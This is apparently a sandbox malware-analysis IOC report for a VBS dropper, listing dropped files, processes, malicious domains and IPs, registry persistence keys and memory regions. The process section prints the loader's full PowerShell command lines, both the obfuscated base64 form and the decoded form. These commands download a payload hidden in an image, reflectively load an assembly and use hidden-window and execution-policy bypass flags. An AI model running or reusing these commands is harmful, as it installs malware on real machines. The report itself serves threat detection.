IOC Report
72625413524.vbs

loading gif

Files

File Path
Type
Category
Malicious
72625413524.vbs
Unicode text, UTF-16, little-endian text, with very long lines (771), with CRLF line terminators
initial sample
 malicious
C:\ProgramData\Name_File.vbs
Unicode text, UTF-8 text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\FIwXa[1].txt
Unicode text, UTF-8 text, with very long lines (11434), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\Log.tmp
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_11ldtlxc.acp.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bd31duw1.ibv.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_extqx3t3.y0o.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fb2iogtw.rhj.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_spsywtsd.5l0.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w14w42uu.3wx.ps1
ASCII text, with no line terminators
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\72625413524.vbs"
 malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBQDgTreFIDgTreTwBKDgTreEUDgTreVDgTreBPDgTreEEDgTreVQBUDgTreE8DgTreTQBBDgTreEMDgTreQQBPDgTreC4DgTreVgBCDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTrebQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreC4DgTreRwBlDgTreHQDgTreTQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreKDgTreDgTrenDgTreFYDgTreQQBJDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreHQDgTreeDgTreB0DgTreC4DgTreaQByDgTreHDgTreDgTreYQB3DgTreHgDgTreLwByDgTreG8DgTrecgByDgTreGUDgTreLwBtDgTreG8DgTreYwDgTreuDgTreHMDgTreZQBwDgTreG8DgTrecgByDgTreGUDgTreaDgTreB0DgTreG4DgTreYQBwDgTreC8DgTreLwDgTre6DgTreHMDgTrecDgTreB0DgTreHQDgTreaDgTreDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreMQDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreQwDgTre6DgTreFwDgTreUDgTreByDgTreG8DgTreZwByDgTreGEDgTrebQBEDgTreGEDgTredDgTreBhDgTreFwDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreE4DgTreYQBtDgTreGUDgTreXwBGDgTreGkDgTrebDgTreBlDgTreCcDgTreLDgTreDgTrenDgTreFIDgTreZQBnDgTreEEDgTrecwBtDgTreCcDgTreLDgTreDgTrenDgTreCcDgTreKQDgTrepDgTreH0DgTreIDgTreB9DgTreDgTre==';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.irpawx/rorre/moc.seporrehtnap//:sptth' , '1' , 'C:\ProgramData\' , 'Name_File','RegAsm',''))} }"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\Name_File.vbs
 malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
 malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\Name_File.vbs"
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\Name_File.vbs"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name
IP
Malicious
http://pesterbdd.com/images/Pester.png
unknown
 malicious
https://pantherropes.com/error/xwapri.txt
116.206.104.215
 malicious
aprilxrwonew8450.duckdns.org
malicious
https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820
172.67.215.45
 malicious
http://nuget.org/NuGet.exe
unknown
http://www.apache.org/licenses/LICENSE-2.0
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://contoso.com/License
unknown
https://www.google.com;
unknown
https://contoso.com/Icon
unknown
https://analytics.paste.ee
unknown
https://aka.ms/pscore6
unknown
https://paste.ee/d/FIwXaU
unknown
https://github.com/Pester/Pester
unknown
https://www.google.com
unknown
https://lesferch.github.io/DesktopPic
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://oneget.orgX
unknown
https://paste.ee/
unknown
https://analytics.paste.ee;
unknown
https://paste.ee/d/FIwXa
172.67.187.200
https://cdnjs.cloudflare.com
unknown
https://aka.ms/pscore68
unknown
https://cdnjs.cloudflare.com;
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://secure.gravatar.com
unknown
https://themes.googleusercontent.com
unknown
https://oneget.org
unknown
https://paste.ee/d/FIwXaok
unknown
There are 20 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
pantherropes.com
116.206.104.215
 malicious
aprilxrwonew8450.duckdns.org
134.255.217.251
 malicious
uploaddeimagens.com.br
172.67.215.45
 malicious
paste.ee
172.67.187.200

IPs

IP
Domain
Country
Malicious
134.255.217.251
aprilxrwonew8450.duckdns.org
Germany
malicious
116.206.104.215
pantherropes.com
Seychelles
malicious
172.67.215.45
uploaddeimagens.com.br
United States
malicious
172.67.187.200
paste.ee
United States

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Path
 malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
There are 5 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
402000
remote allocation
page execute and read and write
 malicious
2C01000
trusted library allocation
page read and write
 malicious
22ECD510000
heap
page read and write
510D000
trusted library allocation
page read and write
C833EFE000
stack
page read and write
22ECD527000
heap
page read and write
65BA000
heap
page read and write
FA7000
heap
page read and write
59FE000
stack
page read and write
5C85477000
stack
page read and write
22ECB720000
heap
page read and write
7FF848900000
trusted library allocation
page execute and read and write
2CC1F580000
heap
page read and write
50EE000
trusted library allocation
page read and write
212E4B37000
heap
page read and write
22ECD591000
heap
page read and write
D4819FF000
stack
page read and write
E1B68FF000
stack
page read and write
2CC1EA03000
heap
page read and write
1C1C5CAA000
heap
page read and write
7FF848B00000
trusted library allocation
page read and write
2209A948000
heap
page read and write
7FF84884D000
trusted library allocation
page execute and read and write
2CC1EC88000
heap
page read and write
2209C89F000
trusted library allocation
page read and write
2CC1CB30000
heap
page read and write
2CC1E9D3000
heap
page read and write
2CC1E9BB000
heap
page read and write
1C1AF03C000
trusted library allocation
page read and write
2790BC01000
trusted library allocation
page read and write
5C8517E000
stack
page read and write
2209A970000
heap
page read and write
D481DFE000
stack
page read and write
22ECD5B1000
heap
page read and write
2209CF88000
trusted library allocation
page read and write
22ECD5C9000
heap
page read and write
1C1AED14000
trusted library allocation
page read and write
2CC1ED07000
heap
page read and write
7FF848844000
trusted library allocation
page read and write
7FF848B20000
trusted library allocation
page read and write
52CE000
stack
page read and write
27900001000
trusted library allocation
page read and write
27900A01000
trusted library allocation
page read and write
E1B61FE000
stack
page read and write
212E2D50000
heap
page read and write
7FF8489D1000
trusted library allocation
page read and write
212E2D40000
heap
page read and write
B6DC1F8000
stack
page read and write
2CC1F580000
heap
page read and write
2CC1F2A0000
heap
page read and write
7FF848A20000
trusted library allocation
page read and write
22ECD52C000
heap
page read and write
2CC1EBD0000
remote allocation
page read and write
220B4927000
heap
page execute and read and write
54EE000
stack
page read and write
F6A000
trusted library allocation
page execute and read and write
22ECD561000
heap
page read and write
2209A928000
heap
page read and write
2CC1F59A000
heap
page read and write
212E2CD0000
heap
page read and write
2CC1ECBF000
heap
page read and write
2209A910000
heap
page read and write
2CC1F3A6000
heap
page read and write
22ECD6FC000
heap
page read and write
1C1ABB50000
heap
page read and write
692E000
unkown
page read and write
212E4BD6000
heap
page read and write
1C1C5CD0000
heap
page read and write
4C08000
trusted library allocation
page read and write
1C1AD6A0000
heap
page read and write
22ECD520000
heap
page read and write
22ECD52B000
heap
page read and write
C8339DE000
stack
page read and write
1168000
heap
page read and write
2CC1EA0D000
heap
page read and write
1070000
trusted library allocation
page read and write
7FF8489F1000
trusted library allocation
page read and write
22ECD516000
heap
page read and write
27901E01000
trusted library allocation
page read and write
212E667D000
heap
page read and write
212E2DF3000
heap
page read and write
F40000
trusted library allocation
page read and write
2CC1F4C6000
heap
page read and write
22ECB7BF000
heap
page read and write
212E2DF5000
heap
page read and write
2CC1F591000
heap
page read and write
22ECD54C000
heap
page read and write
1090000
heap
page read and write
22ECD553000
heap
page read and write
7FF8488F6000
trusted library allocation
page read and write
212E4B30000
heap
page read and write
5C8567E000
stack
page read and write
2CC1EC7F000
heap
page read and write
2209A860000
heap
page read and write
58B9000
stack
page read and write
2CC1EC73000
heap
page read and write
7FF848AE0000
trusted library allocation
page read and write
2209CCD0000
trusted library allocation
page read and write
212E2D4A000
heap
page read and write
22ECD520000
heap
page read and write
2CC1E9B9000
heap
page read and write
B6DC47E000
stack
page read and write
7FF8488D0000
trusted library allocation
page read and write
2CC1EBD0000
remote allocation
page read and write
C833953000
stack
page read and write
7FF848A80000
trusted library allocation
page read and write
2CC1ED20000
heap
page read and write
2CC1ECED000
heap
page read and write
2CC1E9B0000
heap
page read and write
212E2DEC000
heap
page read and write
7FF848A50000
trusted library allocation
page read and write
50E6000
trusted library allocation
page read and write
2CC1EA03000
heap
page read and write
7FF848A22000
trusted library allocation
page read and write
212E4B34000
heap
page read and write
2790B201000
trusted library allocation
page read and write
7FF848AB0000
trusted library allocation
page read and write
212E2D5B000
heap
page read and write
2CC1CB10000
heap
page read and write
2CC1EC7F000
heap
page read and write
212E2D3C000
heap
page read and write
12F0000
heap
page read and write
51B0000
trusted library allocation
page execute and read and write
22ECB6F8000
heap
page read and write
212E4B96000
heap
page read and write
12E9000
trusted library allocation
page read and write
2CC1F47F000
heap
page read and write
2209C9A0000
trusted library allocation
page read and write
1C1ADA77000
heap
page execute and read and write
6617000
heap
page read and write
1C1ABD80000
trusted library allocation
page read and write
7FF848824000
trusted library allocation
page read and write
5C8577E000
stack
page read and write
22ECF0C0000
heap
page read and write
212E2DC2000
heap
page read and write
212E4B30000
heap
page read and write
B6DC3FE000
stack
page read and write
22ECD520000
heap
page read and write
212E4D0C000
heap
page read and write
22ECD538000
heap
page read and write
2209A92A000
heap
page read and write
7FF848A10000
trusted library allocation
page execute and read and write
2793B910000
heap
page read and write
5AA0000
heap
page read and write
2CC1F3C5000
heap
page read and write
2CC1EA04000
heap
page read and write
7FF848AC0000
trusted library allocation
page read and write
2CC1F3D2000
heap
page read and write
5C857FB000
stack
page read and write
2209C9ED000
trusted library allocation
page read and write
22ECF2C0000
heap
page read and write
2CC1CE70000
heap
page read and write
2CC1E9BD000
heap
page read and write
128C000
stack
page read and write
B6DC57F000
stack
page read and write
22ECD5E6000
heap
page read and write
22ECD663000
heap
page read and write
22ECD6FD000
heap
page read and write
2CC1EC5D000
heap
page read and write
2CC1EC95000
heap
page read and write
2CC1EC7F000
heap
page read and write
5CBBFFE000
stack
page read and write
2CC1ED04000
heap
page read and write
2CC1CC2E000
heap
page read and write
212E2DF6000
heap
page read and write
2CC1CECC000
heap
page read and write
27939EC1000
heap
page read and write
2209CC46000
trusted library allocation
page read and write
5C853F9000
stack
page read and write
2CC1EC50000
heap
page read and write
27939F0A000
heap
page read and write
2CC1EC79000
heap
page read and write
2CC1EA03000
heap
page read and write
2CC1F47F000
heap
page read and write
2CC1ECF7000
heap
page read and write
22ECB7C3000
heap
page read and write
22ECB6A0000
heap
page read and write
2CC1E9E3000
heap
page read and write
2793B870000
trusted library allocation
page read and write
212E6678000
heap
page read and write
1C1ADC32000
trusted library allocation
page read and write
2CC1E9FF000
heap
page read and write
22ECD506000
heap
page read and write
7FF848843000
trusted library allocation
page execute and read and write
1C1ABD40000
trusted library allocation
page read and write
682E000
stack
page read and write
212E4B3C000
heap
page read and write
220B4920000
heap
page execute and read and write
1C1ABD00000
heap
page readonly
212E2DC2000
heap
page read and write
2793A080000
heap
page read and write
2209A996000
heap
page read and write
2CC1CECD000
heap
page read and write
2209CCAE000
trusted library allocation
page read and write
2BDA000
stack
page read and write
22ECB710000
heap
page read and write
212E4B19000
heap
page read and write
22ECD5AE000
heap
page read and write
2793A084000
heap
page read and write
27939EC9000
heap
page read and write
2CC1CC45000
heap
page read and write
5CBBEFF000
stack
page read and write
2209C99A000
trusted library allocation
page read and write
D58000
stack
page read and write
2CC1EC50000
heap
page read and write
22ECBA6D000
heap
page read and write
22ECD5B6000
heap
page read and write
27939E80000
heap
page read and write
27903201000
trusted library allocation
page read and write
F30000
trusted library allocation
page read and write
2CC1CBAA000
heap
page read and write
1C1AF410000
trusted library allocation
page read and write
22ECB7C6000
heap
page read and write
212E4BB2000
heap
page read and write
1C1BDC21000
trusted library allocation
page read and write
5180000
trusted library allocation
page read and write
F72000
trusted library allocation
page read and write
220B4A52000
heap
page read and write
212E4B11000
heap
page read and write
E1B69FD000
stack
page read and write
212E4B1F000
heap
page read and write
6B2C000
stack
page read and write
2CC1EC79000
heap
page read and write
220B4A30000
heap
page read and write
2209A840000
heap
page read and write
212E4B86000
heap
page read and write
212E4B57000
heap
page read and write
1040000
